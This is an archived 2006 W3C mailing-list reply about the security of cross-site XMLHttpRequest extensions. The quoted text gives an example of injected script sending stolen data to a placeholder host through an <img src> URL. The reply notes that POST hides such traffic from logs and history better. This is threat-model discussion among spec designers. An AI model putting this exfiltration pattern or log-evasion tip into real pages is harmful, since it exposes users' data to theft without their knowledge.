W3C home > Mailing lists > Public > public-webapi@w3.org > April 2006

Re: (XMLHttpRequest 2) Second proposal for cross-site extensions to XMLHttpRequest

From: Ian Davis <ian.davis@talis.com>
Date: Tue, 18 Apr 2006 13:09:44 +0100
Message-ID: <4444D708.4070207@talis.com>
To: Bjoern Hoehrmann <derhoermi@gmx.net>
CC: public-webapi@w3.org

On 18/04/2006 13:01, Bjoern Hoehrmann wrote:
> If you are able to inject some script you can send any and all data you
> are able to obtain to a third party, in a simple case you could just
> append the data to a new <img src="http://malicious.example/?data=...">.
> So I don't think I understand your concern, could you elaborate?

You're right of course, but it's much easier to hide the data being sent 
from logs and browser history if you use POST.

Ian
Received on Tuesday, 18 April 2006 12:09:56 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Tuesday, 8 January 2008 14:18:54 GMT